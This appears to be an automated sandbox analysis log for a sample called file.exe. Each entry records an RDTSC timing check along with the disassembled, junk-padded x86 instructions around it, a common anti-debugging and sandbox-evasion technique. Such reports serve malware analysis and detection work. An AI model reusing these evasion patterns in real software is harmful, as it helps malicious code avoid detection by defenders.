                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145C2F second address: 1145C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145FB0 second address: 1145FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145FB5 second address: 1145FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC83CB64D43h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146F81 second address: 1146F9B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC83CB776AEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B8E second address: 1148B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B94 second address: 1148B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B98 second address: 1148B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149673 second address: 11496D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC83CB776A6h 0x00000009 jmp 00007FC83CB776AAh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push ecx 0x00000013 and edi, dword ptr [ebp+122D331Ah] 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FC83CB776A8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 sub edi, dword ptr [ebp+122D3348h] 0x0000003e xchg eax, ebx 0x0000003f ja 00007FC83CB776ACh 0x00000045 pushad 0x00000046 push edx 0x00000047 pop edx 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jnp 00007FC83CB776A6h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11496D9 second address: 11496DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11496DD second address: 11496E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F202 second address: 114F208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F208 second address: 114F288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FC83CB776AEh 0x0000000f nop 0x00000010 sub ebx, dword ptr [ebp+122D1966h] 0x00000016 mov di, 8803h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FC83CB776A8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FC83CB776A8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D17EDh], eax 0x00000058 xchg eax, esi 0x00000059 pushad 0x0000005a jmp 00007FC83CB776ABh 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F288 second address: 114F2AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FC83CB64D36h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11501B0 second address: 11501B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11501B6 second address: 1150222 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC83CB64D38h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 and ebx, dword ptr [ebp+122D1AE1h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FC83CB64D38h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D2C3Bh] 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D21A6h], ebx 0x00000055 push eax 0x00000056 pushad 0x00000057 jo 00007FC83CB64D38h 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150222 second address: 1150226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115042C second address: 1150451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jbe 00007FC83CB64D36h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1151415 second address: 115141B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11531D6 second address: 11531DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11531DB second address: 11531FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jno 00007FC83CB776A6h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11531FC second address: 1153243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov bx, D51Bh 0x0000000e mov cl, E6h 0x00000010 popad 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D20F3h], esi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FC83CB64D38h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 movzx edi, dx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1153243 second address: 1153247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1153247 second address: 1153251 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1155271 second address: 1155289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC83CB776A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC83CB776ABh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F180E second address: 10F181D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC83CB64D36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F181D second address: 10F1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115783E second address: 115785F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC83CB64D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115785F second address: 1157863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157863 second address: 115786D instructions: 0x00000000 rdtsc 0x00000002 js 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11579D8 second address: 11579DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11579DC second address: 11579E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115A759 second address: 115A7C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+124830F0h], eax 0x00000012 mov ebx, dword ptr [ebp+122D2174h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FC83CB776A8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov di, 97E8h 0x00000038 mov dword ptr [ebp+1244D3DEh], edi 0x0000003e push 00000000h 0x00000040 pushad 0x00000041 jnc 00007FC83CB776ACh 0x00000047 stc 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d jmp 00007FC83CB776ADh 0x00000052 pop edi 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115C6C5 second address: 115C6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115C900 second address: 115C90B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115D79A second address: 115D7A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115D7A4 second address: 115D7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115F7F7 second address: 115F801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115E93A second address: 115E93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115F801 second address: 115F86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jnl 00007FC83CB64D4Eh 0x0000000f nop 0x00000010 stc 0x00000011 push 00000000h 0x00000013 pushad 0x00000014 push esi 0x00000015 mov ebx, dword ptr [ebp+122D2B4Fh] 0x0000001b pop esi 0x0000001c pushad 0x0000001d mov ebx, dword ptr [ebp+122D1BCDh] 0x00000023 popad 0x00000024 popad 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FC83CB64D38h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov di, 8806h 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115E93E second address: 115E942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115F86E second address: 115F873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115F873 second address: 115F89A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FC83CB776ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115F89A second address: 115F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115F9AC second address: 115F9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB776B1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1167ACE second address: 1167AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC83CB64D36h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1167551 second address: 1167581 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC83CB776A6h 0x00000008 jmp 00007FC83CB776B5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FC83CB776B1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116BF1D second address: 116BF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116BF21 second address: 116BF27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116BF27 second address: 116BF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C055 second address: 116C080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC83CB776ABh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C080 second address: 116C085 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C0DE second address: 116C0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C0E2 second address: 116C0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C0E6 second address: 116C0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C1D5 second address: 116C1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C1DA second address: F91BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 118B668Ch 0x00000011 jp 00007FC83CB776B2h 0x00000017 push dword ptr [ebp+122D1529h] 0x0000001d jnl 00007FC83CB776A7h 0x00000023 stc 0x00000024 call dword ptr [ebp+122D29D3h] 0x0000002a pushad 0x0000002b sub dword ptr [ebp+122D31FEh], edi 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D26D4h], ecx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d or dword ptr [ebp+122D26D4h], edx 0x00000043 mov dword ptr [ebp+122D29E7h], eax 0x00000049 jmp 00007FC83CB776ADh 0x0000004e mov esi, 0000003Ch 0x00000053 jnl 00007FC83CB776ACh 0x00000059 mov dword ptr [ebp+122D33C6h], eax 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 mov dword ptr [ebp+122D31FEh], ecx 0x0000006a or ecx, dword ptr [ebp+122D2C47h] 0x00000070 popad 0x00000071 lodsw 0x00000073 sub dword ptr [ebp+122D26D4h], esi 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d pushad 0x0000007e mov dword ptr [ebp+122D31FEh], ecx 0x00000084 push eax 0x00000085 pop esi 0x00000086 popad 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b jmp 00007FC83CB776B7h 0x00000090 push eax 0x00000091 pushad 0x00000092 push edx 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170C93 second address: 1170C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170C9B second address: 1170CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC83CB776B3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170E1C second address: 1170E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170F63 second address: 1170F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170F67 second address: 1170F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170F6D second address: 1170F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC83CB776A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11713C4 second address: 11713C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11713C9 second address: 11713D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176729 second address: 117673C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC83CB64D3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176C0A second address: 1176C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176C10 second address: 1176C3C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC83CB64D36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC83CB64D3Ch 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FC83CB64D36h 0x0000001b jmp 00007FC83CB64D3Ah 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117735D second address: 1177378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177632 second address: 117765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D3Eh 0x00000009 jmp 00007FC83CB64D46h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117765A second address: 1177664 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83CB776ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176415 second address: 117643F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D49h 0x00000009 pop edx 0x0000000a jno 00007FC83CB64D3Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117643F second address: 1176446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C368 second address: 117C375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC83CB64D36h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C375 second address: 117C391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jg 00007FC83CB776A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C4D5 second address: 117C4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117CD93 second address: 117CDA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117CDA9 second address: 117CDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117CDB4 second address: 117CDB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F4D6B second address: 10F4D75 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB64D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F4D75 second address: 10F4D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F4D7F second address: 10F4D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC83CB64D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F4D89 second address: 10F4D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F4D8D second address: 10F4DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 jno 00007FC83CB64D4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FC83CB64D43h 0x00000021 rdtsc
